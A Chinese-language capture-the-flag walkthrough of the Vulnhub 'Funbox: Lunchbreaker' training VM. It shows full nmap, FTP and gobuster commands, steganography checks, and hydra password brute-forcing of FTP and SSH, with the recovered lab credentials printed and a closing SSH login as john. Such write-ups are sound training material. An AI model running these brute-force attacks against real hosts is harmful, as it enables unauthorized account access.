【Vulnhub 靶场】【Funbox: Lunchbreaker】【简单】【20210522】

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/
靶场下载:https://download.vulnhub.com/funbox/FunboxLunchbreaker.ova
靶场难度:简单
发布日期:2021年05月22日
文件大小:1.6 GB
靶场作者:0815R2d2
靶场系列:Funbox
靶场描述:这是一个初学者的盒子,可以在午休时打开。这在VirtualBox而不是VMware中更有效
打靶耗时:4+小时,技术上没有什么难度,就是太绕了。。。来来回回就那么两条命令。。。不过的确提供了一些很特殊的思路。
打靶关键: FTP 操作 与 密码爆破

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.46   08:00:27:3e:67:06       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.310 seconds (110.82 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.46
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-30 23:04 EST
Nmap scan report for 192.168.56.46
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0             633 May 22  2021 supers3cr3t
|_drwxr-xr-x    6 1006     1006         4096 May 22  2021 wordpress
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1d:3d:bf:5a:e1:9f:bb:31:85:34:94:24:cf:0c:04:20 (RSA)
|   256 3b:e1:5c:97:5a:93:1d:9c:d5:02:e5:d8:15:a7:92:ea (ECDSA)
|_  256 d6:f2:e3:da:7e:d7:3f:94:7e:3b:5d:bc:ef:ee:49:63 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:3E:67:06 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.56.46

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.09 seconds

3、端口访问

3.1、21端口 - FTP

  • 根据 FTP 目录分析,可能存在 FTP 上传 WebShell 的可能性
  • 也可能存在密码爆破,看后面能不能找到用户名

3.1.1、FTP 文件下载

  • 下载文件「supers3cr3t」「.s3cr3t」
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46                   
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||35135|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        118          4096 May 22  2021 .
drwxr-xr-x    3 0        118          4096 May 22  2021 ..
-rw-r--r--    1 0        0             233 May 22  2021 .s3cr3t
-rw-r--r--    1 0        0             633 May 22  2021 supers3cr3t
drwxr-xr-x    6 1006     1006         4096 May 22  2021 wordpress
226 Directory send OK.
ftp> lcd /root/soft/hack
Local directory now: /root/soft/hack
ftp> get supers3cr3t
local: supers3cr3t remote: supers3cr3t
229 Entering Extended Passive Mode (|||35096|)
150 Opening BINARY mode data connection for supers3cr3t (633 bytes).
100% |**************************************************************|   633      594.38 KiB/s    00:00 ETA
226 Transfer complete.
633 bytes received in 00:00 (209.33 KiB/s)
ftp> get .s3cr3t
229 Entering Extended Passive Mode (|||42850|)
150 Opening BINARY mode data connection for .s3cr3t (233 bytes).
100% |**************************************************************|   233      473.05 KiB/s    00:00 ETA
226 Transfer complete.
233 bytes received in 00:00 (183.20 KiB/s)
ftp> exit
221 Goodbye.
  • 下载文件夹「wordpress」
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# cd ~/soft/hack
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# wget -r -np -nH ftp://192.168.56.46/wordpress
--2023-12-01 00:37:23--  ftp://192.168.56.46/wordpress
           => “.listing”
正在连接 192.168.56.46:21... 已连接。
正在以 anonymous 登录 ... 登录成功!
==> SYST ... 完成。   ==> PWD ... 完成。
==> TYPE I ... 完成。 ==> 不需要 CWD。
==> PASV ... 完成。   ==> LIST ... 完成。
......
下载完毕 --2023-12-01 00:37:32--
总用时:9.3s
下载了:1566 个文件,1.9s (21.6 MB/s) 中的 41M

3.1.2、「supers3cr3t」「.s3cr3t」文件读取 与 解码

  • 获取提示(不像有用的样子):
    • 深入大自然,你就会更好地理解一切。
    • 如果一千个太阳的光辉/立即绽放到天空中/那就像/强者的光辉,我将成为死亡,世界的破碎者
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ls    
supers3cr3t  wordpress
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat supers3cr3t             
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat supers3cr3t | python ../Brainfuck解码.py    
解码前:++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++.>+++++++++++..----.<<++.>>-------.+..+++++++++++.<<.>>-------.+++++.++++++.-----.<<.>>-.-------------.+++++++++++++++++++.+.---.-------------.<<.>>----.+++++++++++++.----------.<<.>>++++++++++++++++.------------.---.+++++++++.<<.>>+++++++++++.----------.++++++.<<.>>++.--------------.+++..<<.>>+++++++++.-------.----------.+.+++++++++++++.+.+.-------------------.+++++++++++++.----------.<<.>>+.+++++++++++++++++.-----------------.+++++++++++++.+++++++.-----.------------.+.+++++.-------.<<.>>-----.+++.+++++++++++++++..---------------.+++++++++++++.<<++++++++++++++.------------.
解码后:Look deep into nature and then you will understand everything better."
翻  译:深入大自然,你就会更好地理解一切。
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat .s3cr3t                 
SWYgdGhlIHJhZGlhbmNlIG9mIGEgdGhvdXNhbmQgc3VucyAvIHdlcmUgdG8gYnVyc3QgYXQgb25jZSBpbnRvIHRoZSBza3kgLyB0aGF0IHdvdWxkIGJlIGxpa2UgLyB0aGUgc3BsZW5kb3Igb2YgdGhlIE1pZ2h0eSBPbmUgYW5kIEkgYW0gYmVjb21lIERlYXRoLCB0aGUgc2hhdHRlcmVyIG9mIHdvcmxkcw==
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat .s3cr3t | base64 -d
If the radiance of a thousand suns / were to burst at once into the sky / that would be like / the splendor of the Mighty One and I am become Death, the shatterer of worlds
如果一千个太阳的光辉/立即绽放到天空中/那就像/强者的光辉,我将成为死亡,世界的破碎者

3.1.3、「wordpress」文件夹内容搜索

  • 数据库密码搜索
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# grep -ri -E 'DB_PASSWORD' *
wp-admin/setup-config.php:              define( 'DB_PASSWORD', $pwd );
wp-admin/setup-config.php:                              case 'DB_PASSWORD':
wp-config.php:define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
wp-config-sample.php:define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
wp-includes/load.php:   $dbpassword = defined( 'DB_PASSWORD' ) ? DB_PASSWORD : '';
  • 获取了两个数据库用户密码
    • 10.10.10.12:不是本地IP,可能存在容器
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# cat wp-config.php                           
<?php
......
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'JuZhRbNNk.()' );
define( 'DB_HOST', '10.10.10.12' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# cat wp-config-sample.php
<?php
......
define( 'DB_NAME', 'datenbankname_hier_einfuegen' );
define( 'DB_USER', 'benutzername_hier_einfuegen' );
define( 'DB_PASSWORD', 'passwort_hier_einfuegen' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define('DB_COLLATE', '');
......

3.2、22端口 - SSH

  • 初步登录查看是否有可用提示
(base) ┌──(root㉿kali)-[~/soft/hack/wordpress] (๑•̀ㅂ•́)و✧ 
└─# ssh 192.168.56.46    
The authenticity of host '192.168.56.46 (192.168.56.46)' can·t be established.
ED25519 key fingerprint is SHA256:A887jwxDkjOcXiGyfxtQS9gU3vV0CwSl3h7KaSGiOjY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.46' (ED25519) to the list of known hosts.
[email protected]'s password:

3.3、80端口 - Web

  • 获取两个信息
  • 背景图片:可能存在隐写,但是优先级不高,如果后续没有线索,返回来分析图片
<!-- webdesign by j.miller [[email protected]] -->

4、目录扫描

  • robots.txt 中的的目录名很有意思:
    • dirbgobuster:都是目录扫描工具
    • etc:Linux系统配置文件所在的目录
    • WYSIWYG:what you see is what you get(所见即所得)
# 基础小字典,初扫摸底
dirb http://192.168.56.46
# 较全面 conda activate py37
dirsearch -u http://192.168.56.46 -t 64 -e *
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.46 -lcf
  • http://192.168.56.46/index.html
  • http://192.168.56.46/robots.txt

【Vulnhub 靶场】【Funbox: Lunchbreaker】【简单】【20210522】_第1张图片

4.1、「robots」目录扫描(干干净净,啥都没。。。)

  • 原来「所见即所得」是这个意思,告诉我们不用做目录扫描。。。
  • 不去亲自扫一遍,谁知道会不会是干扰信息呢。(╯°□°)╯︵┻━┻
gobuster dir -u http://192.168.56.46/dirb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/etc -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
gobuster dir -u http://192.168.56.46/WYSIWYG -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q

5、好吧,开始解析图片。。。

  • 图片下载
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# wget http://192.168.56.46/image.jpg    
--2023-12-01 02:17:30--  http://192.168.56.46/image.jpg
正在连接 192.168.56.46:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:7053571 (6.7M) [image/jpeg]
正在保存至: “image.jpg”

image.jpg                  100%[=======================================>]   6.73M  --.-KB/s  用时 0.07s   

2023-12-01 02:17:30 (99.5 MB/s) - 已保存 “image.jpg” [7053571/7053571])

5.1、本地图片解析

5.1.1、steghide 解析(失败)

  • 查看图片信息(发现存在密码)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# steghide info image.jpg 
"image.jpg":
  format: jpeg
  capacity: 376.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: could not extract any data with that passphrase!
  • 初次爆破密码(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# stegseek image.jpg /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.59% (132.9 MB)           
[!] error: Could not find a valid passphrase.
  • 第二次种子爆破(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# stegseek --seed image.jpg 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.99% (4294720000 seeds)           
[!] error: Could not find a valid seed.

5.1.2、binwalk 解析(失败)

  • 提取文件(失败)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# binwalk -e image.jpg --run-as=root 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, EXIF standard
12            0xC             TIFF image data, little-endian offset of first image directory: 8
8566          0x2176          Copyright string: "Copyright (c) 1998 Hewlett-Packard Company"

                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ls
image.jpg  reports  supers3cr3t  wordpress

5.1.3、foremost 解析(失败)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# foremost image.jpg                           
Processing: image.jpg
|*|
                                                                                                           
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# tree -a output                 
output
├── audit.txt
└── jpg
    └── 00000000.jpg

2 directories, 2 files

5.2、在线图片解析(同样,啥也没看出来)

StegOnline

6、SSH 密码爆破(同步做 FTP 爆破)

  • 当前(初步)没有什么信息好利用了,只剩下一个可能的用户名jane
  • 如果依然不行,那就只能更换不同字典,重新进行目录扫描,与密码爆破了
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:46:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[STATUS] 378.00 tries/min, 378 tries in 00:01h, 14344056 to do in 632:28h, 29 active
[STATUS] 218.00 tries/min, 654 tries in 00:03h, 14343785 to do in 1096:38h, 24 active
...... 失败,没有爆破出来

7、FTP 密码爆破

  • 爆破出密码:login: jane password: password
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# hydra -l jane -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 02:56:18
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46   login: jane   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 02:56:24

7.1、下载文件

  • FTP 当前的目录结构,像是 Linux 用户/home
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jane
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||57051|)
150 Here comes the directory listing.
dr-x------    3 1002     1002         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1002     1002          220 May 22  2021 .bash_logout
-rw-r--r--    1 1002     1002         3771 May 22  2021 .bashrc
-rw-r--r--    1 1002     1002          807 May 22  2021 .profile
drwxr-xr-x    2 1002     1002         4096 May 22  2021 backups
226 Directory send OK.
ftp> cd backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||44799|)
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 May 22  2021 .
dr-x------    3 1002     1002         4096 May 22  2021 ..
-rw-r--r--    1 1002     1002           59 May 22  2021 keys.txt
226 Directory send OK.
ftp> get keys.txt
local: keys.txt remote: keys.txt
229 Entering Extended Passive Mode (|||19248|)
150 Opening BINARY mode data connection for keys.txt (59 bytes).
100% |*********************************************************|    59        0.98 MiB/s    00:00 ETA
226 Transfer complete.
59 bytes received in 00:00 (45.72 KiB/s)
  • 这个 keys.txt 目前不知道咋用,可能是什么密码吧
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat keys.txt  
kJGgh-kiu65-zghku-76zzt-hgf56
llij8-fgzZ-rTzU1-ddfgz-i876S

7.2、发现像 /home,验证一下

  • 果然。。。就是
ftp> ls -al
229 Entering Extended Passive Mode (|||32072|)
150 Here comes the directory listing.
dr-x------    3 1002     1002         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1002     1002          220 May 22  2021 .bash_logout
-rw-r--r--    1 1002     1002         3771 May 22  2021 .bashrc
-rw-r--r--    1 1002     1002          807 May 22  2021 .profile
drwxr-xr-x    2 1002     1002         4096 May 22  2021 backups
226 Directory send OK.
ftp> pwd
Remote directory: /home/jane
ftp> cd ../
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||16839|)
150 Here comes the directory listing.
drwxr-xr-x    6 0        0            4096 May 22  2021 .
drwxr-xr-x   20 0        0            4096 May 22  2021 ..
dr-x------    3 1002     1002         4096 May 22  2021 jane
dr-x------    3 1001     1001         4096 May 22  2021 jim
dr-x------    4 1000     1000         4096 May 22  2021 john
drwx------    4 1003     1003         4096 May 22  2021 jules
226 Directory send OK.

7.3、jane 用户信息收集

  • 没啥信息,就是知道了存在四个用户:janejimjohnjules
ftp> cd jim
550 Failed to change directory.
ftp> cd john
550 Failed to change directory.
ftp> cd jules
550 Failed to change directory.

7.4、FTP 操作有限,尝试爆破另外三个用户密码

  • login: jane password: password
  • login: jim password: 12345
  • john 爆破失败
  • login: jules password: sexylady
# 不建议这样合在一起爆破,如果中间有一个爆破不出来,都会等好长时间
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat user  
jane
jim
john
jules

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -L user -P /usr/share/wordlists/rockyou.txt -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 03:34:43
[DATA] max 64 tasks per 1 server, overall 64 tasks, 57377596 login tries (l:4/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46   login: jane   password: password
[21][ftp] host: 192.168.56.46   login: jim   password: 12345
......(For a long, long time)
[21][ftp] host: 192.168.56.46   login: jules   password: sexylady

7.5、FTP 登录 jim 用户

  • 两个 SSH 相关文件都是空的
  • 而且禁止上传文件
  • 那这个用户的作用不是很大
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46                
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jim
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||15289|)
150 Here comes the directory listing.
dr-x------    3 1001     1001         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1001     1001          220 May 22  2021 .bash_logout
-rw-r--r--    1 1001     1001         3771 May 22  2021 .bashrc
-rw-r--r--    1 1001     1001          807 May 22  2021 .profile
dr-xr-xr-x    2 1001     1001         4096 May 22  2021 .ssh
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||26295|)
150 Here comes the directory listing.
dr-xr-xr-x    2 1001     1001         4096 May 22  2021 .
dr-x------    3 1001     1001         4096 May 22  2021 ..
-rw-r--r--    1 1001     1001            0 May 22  2021 authorized_keys
-r--------    1 1001     1001            0 May 22  2021 id_rsa
226 Directory send OK.
ftp> put passwd 
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||20802|)
550 Permission denied.

7.6、FTP 登录 jules 用户

  • 发现了两个字典
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): jules
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||40874|)
150 Here comes the directory listing.
drwx------    4 1003     1003         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
drwx------    2 1003     1003         4096 May 22  2021 .backups
-rw-------    1 1003     1003           10 May 22  2021 .bash_history
-rw-r--r--    1 1003     1003          220 May 22  2021 .bash_logout
-rw-r--r--    1 1003     1003         3771 May 22  2021 .bashrc
drwx------    2 1003     1003         4096 May 22  2021 .cache
-rw-r--r--    1 1003     1003          807 May 22  2021 .profile
226 Directory send OK.
ftp> cd .cache
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||63865|)
150 Here comes the directory listing.
drwx------    2 1003     1003         4096 May 22  2021 .
drwx------    4 1003     1003         4096 May 22  2021 ..
-rw-r--r--    1 1003     1003            0 May 22  2021 motd.legal-displayed
226 Directory send OK.
ftp> cd ../
250 Directory successfully changed.
ftp> cd .backups
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||52228|)
150 Here comes the directory listing.
drwx------    2 1003     1003         4096 May 22  2021 .
drwx------    4 1003     1003         4096 May 22  2021 ..
-r--------    1 1003     1003     139921517 May 22  2021 .bad-passwds
-r--------    1 1003     1003            0 May 22  2021 .forbidden-passwds
-r--------    1 1003     1003          562 May 22  2021 .good-passwd
-r--------    1 1003     1003            0 May 22  2021 .very-bad-passwds
226 Directory send OK.
ftp> lpwd
Local directory: /root/soft/hack
ftp> mget .bad-passwds .good-passwd
mget .bad-passwds [anpqy?]? 
229 Entering Extended Passive Mode (|||36078|)
150 Opening BINARY mode data connection for .bad-passwds (139921517 bytes).
100% |*********************************************************|   133 MiB   68.70 MiB/s    00:00 ETA
226 Transfer complete.
139921517 bytes received in 00:01 (68.67 MiB/s)
mget .good-passwd [anpqy?]? 
229 Entering Extended Passive Mode (|||10353|)
150 Opening BINARY mode data connection for .good-passwd (562 bytes).
100% |*********************************************************|   562      417.04 KiB/s    00:00 ETA
226 Transfer complete.
562 bytes received in 00:00 (195.87 KiB/s)

7.7、重新爆破 john 用户

  • login: john password: zhnmju!!!
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -l john -P .bad-passwds -t 64 192.168.56.46 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:14:25
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~224132 tries per task
[DATA] attacking ftp://192.168.56.46:21/
[21][ftp] host: 192.168.56.46   login: john   password: zhnmju!!!
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 8 final worker threads did not complete until end.
[ERROR] 8 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:15:12

7.8、john 用户信息收集

  • 获取提示:
    • Chance R00TPASSWD, because it's the same right now.
    • 机会R00TPASSWD,因为现在也一样
    • root密码 可能与当前爆破出来的密码相同,大概率zhnmju!!!,毕竟其他密码都爆破过了
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ftp 192.168.56.46
Connected to 192.168.56.46.
220 (vsFTPd 3.0.3)
Name (192.168.56.46:root): john
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||39099|)
150 Here comes the directory listing.
dr-x------    4 1000     1000         4096 May 22  2021 .
drwxr-xr-x    6 0        0            4096 May 22  2021 ..
-rw-r--r--    1 1000     1000          220 Feb 25  2020 .bash_logout
-rw-r--r--    1 1000     1000         3771 Feb 25  2020 .bashrc
drwx------    2 1000     1000         4096 May 22  2021 .cache
-rw-r--r--    1 1000     1000          807 Feb 25  2020 .profile
drwx------    2 1000     1000         4096 May 22  2021 .todo
226 Directory send OK.
ftp> cd .todo
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||11684|)
150 Here comes the directory listing.
drwx------    2 1000     1000         4096 May 22  2021 .
dr-x------    4 1000     1000         4096 May 22  2021 ..
-rwx------    1 1000     1000          131 May 22  2021 todo.list
226 Directory send OK.
ftp> get todo.list
local: todo.list remote: todo.list
229 Entering Extended Passive Mode (|||36045|)
150 Opening BINARY mode data connection for todo.list (131 bytes).
100% |*********************************************************|   131      358.34 KiB/s    00:00 ETA
226 Transfer complete.
131 bytes received in 00:00 (88.59 KiB/s)
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat todo.list     
1. Install LAMP
2. Install MAIL-System
3. Install Firewall
4. Install Plesk
5. Chance R00TPASSWD, because it's the same right now.

8、尝试使用 FTP 密码登录 SSH

  • login: john password: zhnmju!!!
  • login: jules password: sexylady
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat user     
jane
jim
john
jules
root
                                                                                                      
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat passwd 
password
12345
sexylady
zhnmju!!!

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# hydra -L user -P passwd -t 4 192.168.56.46 ssh 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-01 11:27:28
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 16 login tries (l:4/p:4), ~4 tries per task
[DATA] attacking ssh://192.168.56.46:22/
[22][ssh] host: 192.168.56.46   login: john   password: zhnmju!!!
[22][ssh] host: 192.168.56.46   login: jules   password: sexylady
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-01 11:27:50

8.1、SSH 登录 john 用户

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 01 Dec 2023 09:26:58 AM UTC

  System load:  0.01              Processes:               160
  Usage of /:   88.3% of 4.37GB   Users logged in:         0
  Memory usage: 12%               IPv4 address for enp0s3: 192.168.56.46
  Swap usage:   0%

  => / is using 88.3% of 4.37GB

64 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

